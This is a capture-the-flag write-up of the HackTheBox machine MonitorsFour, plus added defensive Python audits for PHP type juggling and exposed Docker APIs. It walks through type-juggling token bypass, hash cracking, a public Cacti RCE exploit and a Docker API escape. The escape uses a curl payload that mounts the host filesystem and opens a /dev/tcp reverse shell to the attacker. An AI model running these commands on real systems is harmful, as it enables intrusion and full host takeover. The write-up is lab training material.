MonitorsFour Writeup (HackTheBox Easy Machine)
Overview
MonitorsFour is an easy Windows machine from HackTheBox. Although it is rated easy, it can definitely pose some problems, but it has a couple of interesting vulnerabilities.
We start with enumeration and discover a subdomain and an API. We abuse a type juggling flaw in PHP to reach a special endpoint that exposes sensitive information about users. Then we access the Cacti dashboard and exploit an RCE vulnerability to get a shell.
Next, we identify a Docker environment and the Docker version. We find an escape online, mount the entire host filesystem and get access to the host OS.
Nmap scan
Starting with the Nmap scan.
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -A 10.10.11.98 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 10:03 CET
Nmap scan report for monitorsfour.htb (10.10.11.98)
Host is up (0.10s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: MonitorsFour - Networking Solutions
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 26.77 ms 10.10.14.1
2 198.38 ms monitorsfour.htb (10.10.11.98)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds
The Nmap scan showed 2 open ports: port 80 for an Nginx web server serving PHP, and port 5985 for WinRM. Don’t forget to add the “monitorsfour.htb” domain to your “/etc/hosts” file.
Web enumeration
I visited the website, which promoted MonitorsFour Network Solutions. The Wappalyzer plugin identified PHP 8.3.27 on the backend from an HTTP response header (version disclosure might be helpful later).

I ran Gobuster to perform directory fuzzing. It found a couple of pages, but nothing interesting. Next, I ran FFuF to perform subdomain fuzzing. It found the “cacti” subdomain (add it to “/etc/hosts” too).
┌──(root㉿kali)-[/home/kali]
└─# ffuf -u 'http://monitorsfour.htb' -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.monitorsfour.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.monitorsfour.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1168ms]
Cacti is an open-source network monitoring and graphing tool used primarily to track the performance and health of IT infrastructure over time. (ChatGPT)
When I visited this Cacti website, I was met with a login panel, but the page discloses that Cacti version 1.2.28 is in use.

Discovering hidden file with credentials
Additionally, I tend to run Nikto (a web server scanner) on web apps; it tests for common vulnerabilities and reports a couple of useful findings. This time, it found a “.env” entry which, when requested, downloaded a mysterious “Untitled.env” file. The funny thing is that most Kali Linux wordlists do not contain “.env”, which is why we hadn’t discovered this endpoint yet.

The file contained several database-related environment variables, like username and password (likely for internal database), which might be helpful later.

Finding potential Cacti RCE vulnerability
Any time we get software version information, we should do some quick research to see if there are any public vulnerabilities. Googling “Cacti 1.2.28”, I found an arbitrary file creation flaw leading to RCE.

Associated with this CVE, I found this GitHub repo (https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC) with a Python exploit. Unfortunately, we need to be authenticated to perform this attack, so let’s keep this in mind and move on.

Discovering API endpoints & exploiting type juggling in PHP
The original website had a login page as well. I tried a couple of common default credentials but had no luck. If you intercept the traffic with tools like Burp Suite, Caido or the browser DevTools, you’ll see that the website sends POST requests to the “/api/v1/auth” endpoint. So we have an API we can enumerate, which is a great finding.
[Screenshot: login POST requests are being sent to the API endpoint]
I used Gobuster to fuzz the API. It found a couple of endpoints, but the most interesting ones were “/user” and “/users”.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://monitorsfour.htb/api/v1" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64 -r
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://monitorsfour.htb/api/v1
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/user (Status: 200) [Size: 35]
/users (Status: 200) [Size: 35]
/logout (Status: 200) [Size: 4340]
/auth (Status: 405) [Size: 0]
/reset (Status: 405) [Size: 0]
For intercepting network traffic, I like to use Caido, but you can use Burp Suite of course. Our next goal is to extract information from this API.
BUT, I got stuck during my walkthrough here, to the point where I had to look at a writeup. I found this Medium article (https://medium.com/@rahaliashraf732/hackthebox-monitorsfour-4859add0b51c) by “rahaliashraf732”, where they explain the right attack path.
It is explained that since we’re dealing with PHP 8.x, there’s a possibility of a Type Juggling flaw. This means that PHP can misinterpret certain types of values (PHP is a loosely-typed language). In practice, backend code might let through something that it shouldn’t.

This was a totally new concept for me, so I had a discussion with ChatGPT about it. Apparently, this is a common flaw across most PHP versions.

Why am I telling you this? Let’s go back to our API, specifically to the “/users” endpoint. When we try to reach it, we are asked to send a token too.

Now, we can use fuzzing tools like FFuF to spray random tokens, or we can exploit the Type Juggling vulnerability. Wordlists from the PayloadsAllTheThings GitHub repo are very helpful for this attack, but they are not necessary in this exact case.
Trying the simplest payloads first, we find out that a simple ‘0’ does the job and tricks the backend into giving us the list of all users. There were 4 users to be exact, each with their password hash, role, token etc.
[Screenshot: the type-juggled token allows us to pass the security check]
Looking at the tokens, we can guess which token ours was mistaken for. There’s a token that starts with “0e”, the pattern mentioned above in the Type Juggling explanation.
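To make the mechanism concrete, here is an added example (my own code, not code from the original writeup or from the machine) that models PHP 8's loose `==` comparison of two strings in Python and contrasts it with the strict, constant-time check a backend should use instead (`hash_equals()` in PHP, `hmac.compare_digest()` here). The rule it models is the one behind the finding above: when both operands are numeric strings, PHP compares them as numbers, so any token of the form `0e` followed only by digits evaluates to zero and equals `"0"`. The sample token list and all function names are constructed for the demonstration and are not the machine's real values.

```python
import hmac
import re

# What PHP 8 treats as a "numeric string": optional surrounding whitespace,
# optional sign, decimal digits with an optional fraction and exponent.
# Hexadecimal strings are not numeric in modern PHP.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric_string(value: str) -> bool:
    """Return True if PHP 8 would consider `value` a numeric string."""
    return _PHP_NUMERIC.match(value) is not None


def php_loose_equals(left: str, right: str) -> bool:
    """Model of PHP 8's `==` applied to two strings.

    If both operands are numeric strings PHP compares them as numbers, so
    "0" == "0e462097431906509019562988736854" is True: the right-hand side
    parses as 0 * 10**462097... which is 0. Otherwise the comparison is a
    plain byte-wise string comparison.
    """
    if php_is_numeric_string(left) and php_is_numeric_string(right):
        return float(left) == float(right)
    return left == right


def strict_token_equals(presented: str, stored: str) -> bool:
    """Hardened check: type-strict, byte-for-byte and constant-time, which
    is what PHP's hash_equals($stored, $presented) provides."""
    return hmac.compare_digest(presented.encode("utf-8"), stored.encode("utf-8"))


def find_juggling_collisions(tokens, probes=("0", "0e0", "00")):
    """Audit helper: list every stored token that a loose `==` would accept
    for one of the trivial probe values even though the bytes differ.

    Returns a list of (stored_token, accepted_probe) pairs.
    """
    collisions = []
    for token in tokens:
        for probe in probes:
            if php_loose_equals(probe, token) and not strict_token_equals(probe, token):
                collisions.append((token, probe))
                break
    return collisions


# Constructed sample token list for the demonstration (not the machine's
# real data). The first entry has the dangerous "0e<digits>" shape; the
# other two contain hex letters and are therefore not numeric strings.
SAMPLE_TOKENS = [
    "0e462097431906509019562988736854",
    "4b7fa3c1de0a9c5e8f2b6d1a3c7e9f0b",
    "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6",
]


if __name__ == "__main__":
    for token, probe in find_juggling_collisions(SAMPLE_TOKENS):
        print(f"loose == accepts probe {probe!r} for stored token {token!r}")
    print("strict check accepts '0' for any sample token:",
          any(strict_token_equals("0", t) for t in SAMPLE_TOKENS))
```

The audit function is the useful part for a defender: run it over the tokens or hashes a PHP application stores and it lists the ones a loose comparison would accept for a trivial input. The fix on the backend side is not to filter tokens but to replace `==` with `===` or, better, `hash_equals()`, which also removes the timing side channel.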

Accessing Cacti dashboard, exploiting RCE vulnerability & getting user flag
Having 4 hashes, we can try to crack them. We can crack them offline with John or Hashcat, or use the online tool CrackStation.

Just like that, we managed to crack the password of the user “admin”.
Now we have a valid pair of credentials. The best thing to do is to spray them across all the services we know about. Using them on the main website, we got access to the MonitorsFour dashboard.

We can’t use the same creds to access Cacti.
Looking at the list of users, we can find Admin’s full name.

To make progress, we have to be a little creative here. Taking into account Admin’s real name, we can use username “marcus” to get past Cacti login page and access the dashboard.

And hey! We are authenticated to Cacti. Do you remember the vulnerability we found earlier? We can now finally get initial access.
TLDR; we can abuse Cacti graph creation to create arbitrary PHP scripts, and thus get code execution.
I set up my listener and ran the exploit with appropriate parameters.
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.15.204 -l 1234
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: hzD8m.php
[+] Got payload: /bash
[i] Created PHP filename: wef3R.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
And I got a shell as “www-data”.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.204] from (UNKNOWN) [10.10.11.98] 52030
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$
There was one user, “marcus”. The user flag waits in his home directory.
www-data@821fbd6a43fa:~/html/cacti$ cd /home/marcus
cd /home/marcus/
www-data@821fbd6a43fa:/home/marcus$ ls -la
ls -la
total 28
drwxr-xr-x 1 marcus marcus 4096 Dec 22 04:04 .
drwxr-xr-x 1 root root 4096 Nov 10 16:15 ..
-rw-r--r-- 1 marcus marcus 220 Jul 30 19:28 .bash_logout
-rw-r--r-- 1 marcus marcus 3526 Jul 30 19:28 .bashrc
-rw-r--r-- 1 marcus marcus 807 Jul 30 19:28 .profile
-r-xr-xr-x 1 root root 34 Dec 22 04:01 user.txt
Escaping the Docker container, mounting the host filesystem & getting the root flag
It would be nice to compromise a user with elevated privileges. However, if we look at the filesystem root, we can see that we’re trapped in a Docker container.

Looking back at MonitorsFour dashboard, we can find that Docker 4.44.2 is being used.
[Screenshot: the Docker version hinted at in the Changelog]
Again, doing vulnerability research, we can find a Docker escape exploit.
TLDR; this escape is enabled by unauthenticated access to the Docker Engine API. We can create a privileged container and mount the entire host filesystem into it.

The Docker API should be accessible on “192.168.65.7:2375”. We can try to reach it with “curl” in our shell for confirmation.
www-data@821fbd6a43fa:/$ curl http://192.168.65.7:2375
curl http://192.168.65.7:2375
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 29 0 29 0 0 7257 0 --:--:-- --:--:-- --:--:-- 9666
{"message":"page not found"}
One idea would be to transfer the exploit onto the target machine and run it. Unfortunately, this Docker container doesn’t have essential tools like Python or Wget installed.
So we have to exploit it manually with Curl. I read the Python exploit, read a couple of other articles on this Docker escape, and even took another peek at the writeup.
After a lot of trial and error, I ended up with a working payload. The plan is twofold. First, create a new container with the entire host filesystem mounted and a start-up command that gives us a shell:
www-data@821fbd6a43fa:/$ curl -X POST -H "Content-Type: application/json" \
curl -X POST -H "Content-Type: application/json" \
> -d '{"Image":"alpine","Cmd":["sh","-c","chroot /host /bin/bash -c \"bash -i >& /dev/tcp/10.10.15.204/4444 0>&1\""],"HostConfig":{"Binds":["/:/host"]}}' \
<444 0>&1\""],"HostConfig":{"Binds":["/:/host"]}}' \
> http://192.168.65.7:2375/containers/create
http://192.168.65.7:2375/containers/create
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 234 0 88 100 146 141 233 --:--:-- --:--:-- --:--:-- 375
{"Id":"84d2fe7bbc39588f52424a2e8e24365d87d5b568ff7fa60556d0aa91ccedfd0a","Warnings":[]}
Next, start this container using its ID:
www-data@821fbd6a43fa:/$ curl -X POST http://192.168.65.7:2375/containers/84d2fe7bbc39/start
<p://192.168.65.7:2375/containers/84d2fe7bbc39/start
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
And our listener should receive a connection. We finally got the root shell!
┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.204] from (UNKNOWN) [10.10.11.98] 49645
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@84d2fe7bbc39:/# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
The root flag sits on the Administrator’s Desktop.
root@84d2fe7bbc39:/mnt/host/c/Users/Administrator# ls -la Desktop
ls -la Desktop
total 0
drwxrwxrwx 1 root root 4096 Nov 10 17:54 .
drwxrwxrwx 1 root root 4096 Nov 3 12:05 ..
-rwxrwxrwx 1 root root 282 Mar 24 2025 desktop.ini
-r-xr-xr-x 1 root root 34 Dec 22 10:22 root.txt
And that’s the MonitorsFour machine done!
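As an added defensive counterpart to the escape above (my own code, not code from the original post or from Docker), the following Python audits the kind of JSON body a Docker Engine API client sends to `/containers/create`, plus a daemon.json-style configuration, and flags exactly the conditions the escape relies on: an API listener on TCP without TLS client verification, and a bind mount or privileged flag that hands over the host. `HostConfig`, `Binds`, `Privileged`, `hosts` and `tlsverify` are real Docker field names; the `DANGEROUS_SOURCES` list, the function names and the sample request and daemon config are this example's own constructions. The sample request mirrors the shape of the one in the writeup but with a harmless command.

```python
import json

# Host paths that give a container control of the host once bind-mounted.
# This list is the example's own choice, not a Docker-defined set.
DANGEROUS_SOURCES = ("/", "/var/run/docker.sock", "/etc", "/root", "/proc", "/sys")


def parse_bind(bind: str):
    """Split a HostConfig.Binds entry 'src:dst[:opts]' into its parts.

    Assumes Linux-style source paths (no drive letter), which is what a
    Linux container engine expects in the Binds array.
    """
    parts = bind.split(":")
    src = parts[0]
    dst = parts[1] if len(parts) > 1 else ""
    opts = parts[2] if len(parts) > 2 else "rw"
    return src, dst, opts


def _is_dangerous_source(src: str) -> bool:
    """True if src is the host root or lies under a sensitive host path."""
    if src == "/":
        return True
    return any(src == d or src.startswith(d + "/")
               for d in DANGEROUS_SOURCES if d != "/")


def audit_container_request(body: str) -> list:
    """Audit the JSON body of a POST /containers/create request.

    Returns human-readable findings; an empty list means nothing in the
    request grants access to the host.
    """
    config = json.loads(body)
    host_cfg = config.get("HostConfig", {})
    findings = []
    if host_cfg.get("Privileged"):
        findings.append("privileged container requested")
    for bind in host_cfg.get("Binds", []):
        src, dst, opts = parse_bind(bind)
        if _is_dangerous_source(src):
            findings.append(f"host path {src} bind-mounted at {dst} ({opts})")
    return findings


def audit_daemon_config(daemon: dict) -> list:
    """Audit a daemon.json-style dict for an unauthenticated TCP API listener."""
    findings = []
    for listener in daemon.get("hosts", []):
        if listener.startswith("tcp://") and not daemon.get("tlsverify", False):
            findings.append(f"API listener {listener} without TLS client verification")
    return findings


# Constructed samples: a create request with the host root bind-mounted and
# a harmless command, plus a daemon config that exposes the API on plain TCP.
SAMPLE_CREATE_REQUEST = json.dumps({
    "Image": "alpine",
    "Cmd": ["sh"],
    "HostConfig": {"Binds": ["/:/host"]},
})
SAMPLE_DAEMON_CONFIG = {"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}


if __name__ == "__main__":
    for finding in audit_container_request(SAMPLE_CREATE_REQUEST):
        print("create request:", finding)
    for finding in audit_daemon_config(SAMPLE_DAEMON_CONFIG):
        print("daemon config:", finding)
```

The request audit is the logic you would put in a Docker authorization plugin or an admission check in front of the API, and the daemon audit is the configuration check: a `tcp://` entry in `hosts` without `tlsverify` is what made the unauthenticated `containers/create` call possible on this box. Restricting who can reach the API socket at all removes the whole class of problem, regardless of what the request contains.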
Summary & final thoughts
MonitorsFour is an easy Windows machine from HackTheBox. This box has several cool elements, like API enumeration and Docker escaping, but it is a bit confusing at times, at least for me. We find a lot of things during enumeration and don’t know exactly what to focus on. After the PHP type juggling, which is quite unique in CTFs, we get access to credentials. We use a public exploit to get an initial foothold and land in a Docker container. We are limited to only a couple of binaries, which makes the following escape a bit more difficult.
In my opinion, maybe this machine shouldn’t be rated as easy. The vulnerabilities are fun, but the circumstances make them harder to exploit. Beginners might get stuck because the machine is not straightforward. Overall, I gave it 3 stars. It is probably best suited for intermediate hackers with experience and tough nerves. It definitely feels good once completed, though.